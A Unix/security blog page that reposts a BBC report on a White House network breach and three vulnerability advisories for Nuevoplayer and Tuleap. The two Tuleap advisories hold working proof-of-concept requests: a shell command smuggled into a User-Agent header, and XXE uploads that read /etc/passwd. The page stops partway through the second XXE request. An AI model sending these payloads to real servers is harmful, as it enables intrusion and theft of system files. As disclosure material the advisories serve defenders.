MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29Oct/140

White House computer network ‘hacked’

white house computer network hacked

A White House computer network has been breached by hackers, it has been reported.

The unclassified Executive Office of the President network was attacked, according to the Washington Post.

US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.

White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.

In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.

A White House official, speaking on condition of anonymity, told the Washington Post: "In the course of assessing recent threats, we identified activity of concern on the unclassified EOP network.

"Any such activity is something we take very seriously. In this case, we took immediate measures to evaluate and mitigate the activity.
'State-sponsored'

"Certainly, a variety of actors find our networks to be attractive targets and seek access to sensitive information. We are still assessing the activity of concern."

The source said the attack was consistent with a state-sponsored effort and Russia is thought by the US government to be one of the most likely threats.

"On a regular basis, there are bad actors out there who are attempting to achieve intrusions into our system," a second White House official told the Washington Post.

"This is a constant battle for the government and our sensitive government computer systems, so it's always a concern for us that individuals are trying to compromise systems and get access to our networks."

The Post quoted its sources as saying that the attack was discovered two-to-three weeks ago. Some White House staff were reportedly told to change their passwords and there was some disruption to network services.

In a statement given to Agence France-Presse, a White House official said the Executive Office of the President received daily alerts concerning numerous possible cyber threats.

In the course of addressing the breach, some White House users were temporarily disconnected from the network.

"Our computers and systems have not been damaged, though some elements of the unclassified network have been affected. The temporary outages and loss of connectivity for our users is solely the result of measures we have taken to defend our networks," the official said.

The US's National Security Agency, Federal Bureau of Investigation and Security Service were reportedly investigating.

Requests for comment were referred to the Department for Homeland Security, a spokesman for which was not immediately available. A White House spokesman has not responded to the BBC's request for comment.

Fonte: http://www.bbc.com/news/technology-29817644 (42)

29Oct/140

NuevoLabs flash player for clipshare SQL Injection

Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity: High
CVSS2:    7.7
CVSS2:    (AV:N/AC:L/Au:N/C:P/I:P/A:C/E:F/RL:TF/RC:C)
CVE-ID:   CVE-2014-8339
 
 
:: AFFECTED PRODUCT VERSIONS ::
NUEVOLABS NUEVOPLAYER for clipshare version 8.0 and possibly earlier.
 
nuevolabs.com
clip-share.com
 
 
:: VULNERABILITY DETAILS ::
A sql injection vulnerability in nuevo player midroll feature with integration for clipshare allows remote attackers to 
read any information in the effected mysql database.  Midrolls allow sites to insert ads or "midrolls" into videos 
during playback.
 
Because clipshare stores the administrator password in the database this leads to full comprise of the effected 
clipshare system. 
 
 
:: SOLUTION ::
Vendor is not providing patches for effected customers.
 
If the site does NOT use midrolls, you can simply delete midroll.php to protect yourself.  If you wish to patch the 
issue, you can apply this patch to midroll.php which wraps the $ch variable in a intval() function on line 29 of 
midroll.php:
line 29: 'channel = '.$ch.
becomes: 'channel = '.intval($ch).
 
------------------- CUT HERE -------------------
--- midroll.php 2014-10-16 21:02:36.077663202 -0600
+++ midroll-patched.php 2014-10-16 21:02:02.197662566 -0600
@@ -26,7 +26,7 @@
 
    $chans = explode("|",$channel);
    foreach($chans as $ch) {
-       if(!$ch=='0') { $add.='channel = '.$ch.' OR '; }
+       if(!$ch=='0') { $add.='channel = '.intval($ch).' OR '; }
    }
    $add =trim($add); $add=trim($add,'OR');$add=trim($add);
------------------- CUT HERE -------------------
 
To apply the patch, copy paste this to a new file (midroll.patch for example), upload this file to your server and 
apply the patch with the command: patch /path/to/midroll.php < /path/to/midroll.patch
eg:
$ cp midroll.php /var/www/site/nuevo/midroll.patch
$ cd /var/www/site/nuevo
$ patch midroll.php < midroll.patch
 
 
:: DISCLOSURE ::
 
2014-10-15 initial vendor contact        - no response
2014-10-21 CVE requested
2014-10-23 CVE assigned, vendor contact  - no response
2014-10-24 posted to vendor forum        - no respsone
2014-10-25 fourth vendor contact         - no response
2014-10-26 vendor deletes post and suspends account
2014-10-29 public disclosure
 
 
:: DISCLAIMER ::
 
THE INFORMATION PRESENTED HEREIN ARE PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, 
INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR 
WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE 
PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT 
THE USER'S OWN RISK.

(31)

29Oct/140

Tuleap 7.4.99.5 Remote Command Execution

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
 
 
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
 
 
Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(17)

29Oct/140

Tuleap 7.2 XXE Injection

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload a XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561
 
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"
 
102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"
 
docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"
 
100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"
 
Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"
 
xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
  <item_name>e123&xxe;</item_name>
  <description>123&xxe;</description>
  <cannedResponses/>
  <formElements>
    <formElement type="file" ID="F1" rank="0" use_it="0">
      <name>attachment</name>
      <label>Attachments</label>
    </formElement>
    <formElement type="text" ID="F2" rank="2" use_it="0">
      <name>details</name>
      <label>Original Submission</label>
      <description>A full description of the artifact&xxe;</description>
      <properties rows="7" cols="60"/>
    </formElement>
    <formElement type="string" ID="F3" rank="4" use_it="0" required="1">
      <name>summary</name>
      <label>Summary</label>
      <description>One line description of the artifact&xxe;</description>
      <properties maxchars="150" size="60"/>
    </formElement>
    <formElement type="tbl" ID="F4" rank="6" use_it="0">
      <name>cc</name>
      <label>CC</label>
      <properties hint="Type in a search term"/>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F7" rank="12" use_it="0">
      <name>status_id</name>
      <label>Status</label>
      <description>Artifact Status</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F7-V0" label="Open">
            <description>The artifact has been submitted&xxe;</description>
          </item>
          <item ID="F7-V1" label="Closed">
            <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
          </item>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F8" rank="14" use_it="0">
      <name>assigned_to</name>
      <label>Assigned to</label>
      <description>Who is in charge of solving the artifact&xxe;</description>
      <bind type="users">
        <items>
          <item label="group_members"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F11" rank="20" use_it="0">
      <name>category_id</name>
      <label>Category</label>
      <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F12" rank="22" use_it="0">
      <name>severity</name>
      <label>Priority</label>
      <description>How quickly the artifact must be completed</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F12-V0" label="1 - Lowest"/>
          <item ID="F12-V1" label="2"/>
          <item ID="F12-V2" label="3"/>
          <item ID="F12-V3" label="4"/>
          <item ID="F12-V4" label="5 - Medium"/>
          <item ID="F12-V5" label="6"/>
          <item ID="F12-V6" label="7"/>
          <item ID="F12-V7" label="8"/>
          <item ID="F12-V8" label="9 - Highest"/>
        </items>
        <decorators>
          <decorator REF="F12-V0" r="255" g="255" b="204"/>
          <decorator REF="F12-V1" r="255" g="255" b="102"/>
          <decorator REF="F12-V2" r="255" g="204" b="0"/>
          <decorator REF="F12-V3" r="255" g="153" b="0"/>
          <decorator REF="F12-V4" r="255" g="102" b="0"/>
          <decorator REF="F12-V5" r="255" g="51" b="0"/>
          <decorator REF="F12-V6" r="204" g="51" b="0"/>
          <decorator REF="F12-V7" r="153" g="0" b="0"/>
          <decorator REF="F12-V8" r="51" g="0" b="0"/>
        </decorators>
      </bind>
    </formElement>
    <formElement type="sb" ID="F13" rank="24" use_it="0">
      <name>stage&xxe;</name>
      <label>Stage&xxe;</label>
      <description>Stage in the life cycle of the artifact&xxe;</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F13-V0" label="New">
            <description>The artifact has just been submitted</description>
          </item>
          <item ID="F13-V1" label="Analyzed">
            <description>The cause of the artifact has been identified and documented</description>
          </item>
          <item ID="F13-V2" label="Accepted">
            <description>The artifact will be worked on.</description>
          </item>
          <item ID="F13-V3" label="Under Implementation">
            <description>The artifact is being worked on.</description>
          </item>
          <item ID="F13-V4" label="Ready for Review">
            <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
          </item>
          <item ID="F13-V5" label="Ready for Test">
            <description>Updated/Created software is ready to be included in the next build</description>
          </item>
          <item ID="F13-V6" label="In Test">
            <description>Updated/Created software is in the build and is ready to enter the test phase</description>
          </item>
          <item ID="F13-V7" label="Approved">
            <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
          </item>
          <item ID="F13-V8" label="Declined">
            <description>The artifact was not accepted.</description>
          </item>
          <item ID="F13-V9" label="Done">
            <description>The artifact is closed.</description>
          </item>
        </items>
      </bind>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="tooltip"/>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias/>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns/>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
          <name>Default</name>
          <description>Graphic Report By Default For Support Requests</description>
          <charts/>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow/>
  <permissions>
    <permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
  </permissions>
</tracker>
 
-----------------------------25777276834778
Content-Disposition: form-data; name="name"
 
123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"
 
123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"
 
e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"
 
Créer
-----------------------------25777276834778--
 
 
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=11
 
 
3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:
 
 
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
 
 
Vulnerability 2
 
1) Upload a XXE using the following request:
 
<
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588
 
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"
 
102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"
 
docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"
 
100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"
 
Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"
 
xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml
 
<?xml version="1.0"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>Bugs</name>
  <item_name>bug</item_name>
  <description>Bugs Tracker</description>
  <cannedResponses/>
  <formElements>
    <formElement type="column" ID="F1" rank="120">
      <name>column8</name>
      <label>Column Top 1</label>
      <formElements>
        <formElement type="aid" ID="F2" rank="0">
          <name>artifact_id</name>
          <label>Artifact ID</label>
          <description>Unique artifact identifier&xxe;</description>
        </formElement>
        <formElement type="subby" ID="F3" rank="1">
          <name>submitted_by</name>
          <label>Submitted by</label>
          <description>User who originally submitted the artifact&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="column" ID="F4" rank="121">
      <name>column10&xxe;</name>
      <label>Column Top 2&xxe;</label>
      <formElements>
        <formElement type="lud" ID="F5" rank="0">
          <name>last_update_date</name>
          <label>Last Modified On&xxe;</label>
          <description>Date and time of the latest modification in an artifact&xxe;</description>
        </formElement>
        <formElement type="subon" ID="F6" rank="2">
          <name>open_date&xxe;</name>
          <label>Submitted on&xxe;</label>
          <description>Date and time for the initial artifact submission&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F7" rank="132" required="1">
      <name>fieldset_1</name>
      <label>Details</label>
      <description>fieldset_default_desc_key</description>
      <formElements>
        <formElement type="string" ID="F8" rank="0" required="1">
          <name>summary</name>
          <label>Summary</label>
          <description>One line description of the artifact</description>
          <properties maxchars="150" size="61"/>
        </formElement>
        <formElement type="text" ID="F9" rank="7">
          <name>details</name>
          <label>Original Submission</label>
          <description>A full description of the artifact</description>
          <properties rows="7" cols="80"/>
        </formElement>
        <formElement type="column" ID="F10" rank="8">
          <name>column10</name>
          <label>Column Details 1</label>
          <formElements>
            <formElement type="sb" ID="F11" rank="0">
              <name>severity</name>
              <label>Severity</label>
              <description>Impact of the artifact on the system (Critical, Major,...)</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F11-V0" label="1 - Ordinary"/>
                  <item ID="F11-V1" label="2"/>
                  <item ID="F11-V2" label="3"/>
                  <item ID="F11-V3" label="4"/>
                  <item ID="F11-V4" label="5 - Major"/>
                  <item ID="F11-V5" label="6"/>
                  <item ID="F11-V6" label="7"/>
                  <item ID="F11-V7" label="8"/>
                  <item ID="F11-V8" label="9 - Critical"/>
                </items>
                <decorators>
                  <decorator REF="F11-V0" r="255" g="255" b="102"/>
                  <decorator REF="F11-V1" r="255" g="204" b="51"/>
                  <decorator REF="F11-V2" r="255" g="153" b="0"/>
                  <decorator REF="F11-V3" r="255" g="102" b="0"/>
                  <decorator REF="F11-V4" r="255" g="51" b="0"/>
                  <decorator REF="F11-V5" r="204" g="0" b="0"/>
                  <decorator REF="F11-V6" r="153" g="0" b="0"/>
                  <decorator REF="F11-V7" r="102" g="0" b="0"/>
                  <decorator REF="F11-V8" r="51" g="0" b="0"/>
                </decorators>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F12" rank="12">
          <name>column10</name>
          <label>Column Details 2</label>
          <formElements>
            <formElement type="sb" ID="F13" rank="0">
              <name>category</name>
              <label>Category</label>
              <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
              <bind type="static" is_rank_alpha="0"/>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="date" ID="F14" rank="20" use_it="0">
          <name>close_date</name>
          <label>End Date</label>
          <description>End Date</description>
          <properties default_value="today"/>
        </formElement>
        <formElement type="msb" ID="F15" rank="31" use_it="0">
          <name>multi_assigned_to</name>
          <label>Assigned to (multiple)</label>
          <description>Who is in charge of this artifact</description>
          <properties size="7"/>
          <bind type="users">
            <items>
              <item label="group_members"/>
            </items>
          </bind>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F17" rank="283">
      <name>fieldset1</name>
      <label>Stage</label>
      <formElements>
        <formElement type="column" ID="F18" rank="0">
          <name>column3</name>
          <label>Stage 1</label>
          <formElements>
            <formElement type="sb" ID="F19" rank="2">
              <name>status_id</name>
              <label>Status</label>
              <description>Artifact Status</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F19-V0" label="New"/>
                  <item ID="F19-V1" label="Unconfirmed"/>
                  <item ID="F19-V2" label="Verified"/>
                  <item ID="F19-V3" label="Resolved"/>
                  <item ID="F19-V4" label="Closed"/>
                  <item ID="F19-V5" label="Reopened"/>
                </items>
              </bind>
            </formElement>
            <formElement type="sb" ID="F20" rank="5" use_it="0">
              <name>stage</name>
              <label>Stage</label>
              <description>Stage in the life cycle of the artifact</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F20-V0" label="New">
                    <description>The artifact has just been submitted</description>
                  </item>
                  <item ID="F20-V1" label="Analyzed">
                    <description>The cause of the artifact has been identified and documented</description>
                  </item>
                  <item ID="F20-V2" label="Accepted">
                    <description>The artifact will be worked on.</description>
                  </item>
                  <item ID="F20-V3" label="Under Implementation">
                    <description>The artifact is being worked on.</description>
                  </item>
                  <item ID="F20-V4" label="Ready for Review">
                    <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
                  </item>
                  <item ID="F20-V5" label="Ready for Test">
                    <description>Updated/Created software is ready to be included in the next build</description>
                  </item>
                  <item ID="F20-V6" label="In Test">
                    <description>Updated/Created software is in the build and is ready to enter the test phase</description>
                  </item>
                  <item ID="F20-V7" label="Approved">
                    <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
                  </item>
                  <item ID="F20-V8" label="Declined">
                    <description>The artifact was not accepted.</description>
                  </item>
                  <item ID="F20-V9" label="Done">
                    <description>The artifact is closed.</description>
                  </item>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F21" rank="2">
          <name>column4</name>
          <label>Stage 2</label>
          <formElements>
            <formElement type="sb" ID="F22" rank="0">
              <name>resolution</name>
              <label>Resolution</label>
              <description>The resolution field indicates what happened to the bug.</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F22-V0" label="Fixed"/>
                  <item ID="F22-V1" label="Will not fix"/>
                  <item ID="F22-V2" label="Invalid"/>
                  <item ID="F22-V3" label="Later"/>
                  <item ID="F22-V4" label="Duplicate"/>
                  <item ID="F22-V5" label="Remind"/>
                  <item ID="F22-V6" label="Works for me"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F23" rank="3">
          <name>column9</name>
          <label>Stage 3</label>
          <formElements>
            <formElement type="sb" ID="F24" rank="0" notifications="1">
              <name>assigned_to</name>
              <label>Assigned to</label>
              <description>Who is in charge of solving the artifact</description>
              <bind type="users">
                <items>
                  <item label="group_members"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F25" rank="284">
      <name>fieldset1</name>
      <label>Attachments</label>
      <formElements>
        <formElement type="file" ID="F26" rank="0">
          <name>attachment</name>
          <label>Attachments</label>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F27" rank="286">
      <name>fieldset1</name>
      <label>References</label>
      <formElements>
        <formElement type="cross" ID="F28" rank="0">
          <name>cross_references</name>
          <label>Cross references</label>
          <description>List of items referenced by or referencing this item.</description>
        </formElement>
        <formElement type="art_link" ID="F29" rank="1" use_it="0">
          <name>references</name>
          <label>References</label>
          <properties size="30"/>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F30" rank="287">
      <name>fieldset1</name>
      <label>Permissions</label>
      <formElements>
        <formElement type="perm" ID="F31" rank="0">
          <name>permissions_on_artifact</name>
          <label>Permissions on artifact</label>
          <description>Let users groups to define who can access an artifact.</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="sb" ID="F32" rank="26" use_it="0">
      <name>platform</name>
      <label>Platform</label>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F32-V0" label="Linux"/>
          <item ID="F32-V1" label="Windows XP"/>
          <item ID="F32-V2" label="Solaris"/>
          <item ID="F32-V3" label="Windows 2000"/>
          <item ID="F32-V4" label="Other"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F33" rank="28" use_it="0">
      <name>source</name>
      <label>Source</label>
      <description>Customer from which the request comes from.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F34" rank="30" use_it="0">
      <name>version</name>
      <label>Version</label>
      <description>Product version concerned by the bug.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="title">
      <shortname>title</shortname>
      <label>Titre</label>
      <description>Définir le titre d'un artéfact</description>
      <field REF="F8"/>
    </semantic>
    <semantic type="status">
      <shortname>status</shortname>
      <label>Ã?tat</label>
      <description>Définir l'état d'un artifact</description>
      <field REF="F19"/>
      <open_values>
        <open_value REF="F19-V0"/>
        <open_value REF="F19-V1"/>
        <open_value REF="F19-V2"/>
        <open_value REF="F19-V3"/>
        <open_value REF="F19-V5"/>
      </open_values>
    </semantic>
    <semantic type="contributor">
      <shortname>contributor</shortname>
      <label>Contributor/assignee</label>
      <description>Define the contributor/assignee of an artifact</description>
      <field REF="F24"/>
    </semantic>
    <semantic type="tooltip">
      <field REF="F2"/>
      <field REF="F8"/>
      <field REF="F19"/>
    </semantic>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Bugs</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F5"/>
        </criteria>
        <criteria rank="5">
          <field REF="F8"/>
        </criteria>
        <criteria rank="6">
          <field REF="F9"/>
        </criteria>
        <criteria rank="7">
          <field REF="F22"/>
        </criteria>
        <criteria rank="8">
